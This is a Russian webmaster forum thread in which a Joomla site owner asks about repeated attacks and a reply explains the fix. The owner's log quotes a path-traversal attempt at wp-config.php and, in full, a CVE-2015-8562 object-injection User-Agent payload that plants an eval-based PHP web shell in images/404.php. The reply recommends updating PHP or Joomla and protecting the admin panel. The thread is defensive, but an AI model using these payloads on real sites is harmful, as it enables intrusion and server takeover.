Попытки взломать сайт
Страницы: 1
Попытки взломать сайт, CMS Joomla
Приветствую всех! Проблема такая: где-то пол года взломали сайт. Недавно решил восстановить сайт с нуля (на том же домене), однако после его восстановления атаки на сайт не прикратились. На сайте стоит компонент Rsfirewall, который ежедневно сообщает об опасности среднего уровня. Некоторые сообщения говорят о том, что на сайт пытались зайти используя неправильный логи/пароль. Другие указывает на то, что была попытка локального включения файла (более подробная информация - URI: download=../../../wp-config.php
Совпадение: ./ ). И ещё одни сообщения говорят об обнаружении опасного пользовательского агента:

Код
Пользовательский агент: 
}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:253:"file_put_contents($_SERVER["DOCUMENT_ROOT"].chr(47)."images".chr(47)."404.php","|=|\x3C".chr(63)."php
 
\x24mujj=\x24_POST['@123'];if(\x24mujj!=''){\x24xsser=base64_decode(\x24_POST['z0']);@eval(\"\\\x24safedg=\x24xsser;\");}");JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}~
               
 


 Я баню IP через которые происходят атаки (и вообще внёс в чёрный список почти все страны), но атаки не прекращаются с других адресов. Что это за атаки и как возможно максимально обезопасить себя от них?
Атакуют джумлу через сплойт, подробно описанный www.skillz.ru/dev/php/article-Joomla-remote-code-vulnerability-cve-2015-8562.html]тутМожно либо обновить PHP, либо джумлу. 
Цитата
1. session_decode исправлен в PHP начиная с 5.5.29, 5.6.13 (если у вас актуальные версии - ваш сайт в безопасности).
2. Уязвимость закрыта в Joomla 3.4.6
Бан айпи - это не выход, а мелкая неприятность для хакера. 

Добавьте basic авторизацию на админку
Цитата
siteclean пишет:
Атакуют джумлу через сплойт, подробно описанный www.skillz.ru/dev/php/article-Joomla-remote-code-vulnerability-cve-2015-8562.html]тутМожно либо обновить PHP, либо джумлу.
Цитата
1. session_decode исправлен в PHP начиная с 5.5.29, 5.6.13 (если у вас актуальные версии - ваш сайт в безопасности).
2. Уязвимость закрыта в Joomla 3.4.6
Бан айпи - это не выход, а мелкая неприятность для хакера.

Добавьте basic авторизацию на админку
Спасибо! Не подскажите как сделать такую авторизацию?
Страницы: 1
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
06:34 Гугл пухнет от кеша, а нам - крошки. Разбор $114 млрд: Адсенс в минусе, Ютуб на подписках 
06:17 01.02. Апдейт 31.01 // Chrome готовит "чёрную метку" для ИИ? 
01:09 Yahoo Scout: Нейро-привет из склепа. Реальный шанс на траф или мимо? 
17:33 AntiBot Cloud - бесплатный скрипт и сервис защиты сайтов 
15:14 Апдейт Яндекса 7 февраля. Пока серп трясет, некоторые по ботам плачут 
15:10 Google Discover Core Update: Дискавер отделяют от поиска? 
11:30 ЕС душит ТикТок: прощай бесконечная лента и RPM? Что с монетизацией? 
10:22 Swapwatch.org — Мониторинг криптовалютных обменников 
10:19 SwapPix.io - быстрый и безопасный обменник криптовалют. 
15:12 CryptoGraph — Анонимный обмен криптовалют без KYC и AML 
12:38 Bankomat001 - Сервис обмена электронных валют 
10:42 Рассылки СМС/SMS, Вайбер/Viber, Ватсап/Whatsapp, Телеграм/Telegram любой тематики по всему миру 
09:36 Мониторинг обменников Сrypto-scout.io 
05:29 Продам обменник криптовалюты, а также новый обменник под ключ с обучением. Скидки на скрипты обменника 
07:51 Гильотина для классиков: Клод доедает физические книги 
06:04 Кулеры и БП станут золотыми? Медь по 13 штук, олово в космосе 
05:09 Точные прогнозы на футбол 
23:45 Ставки на супер тренды в спорте 
18:56 Moltbook: Соцсеть для ботов, где людям закрыли рот. Началось? 
22:31 [AI] Бот за $600к советовал есть сыр с крысами. Нью-Йорк его (наконец-то) снес 
13:38 Осталось 3-5 месяцев до блокировки YouTube в России, — заявил Клименко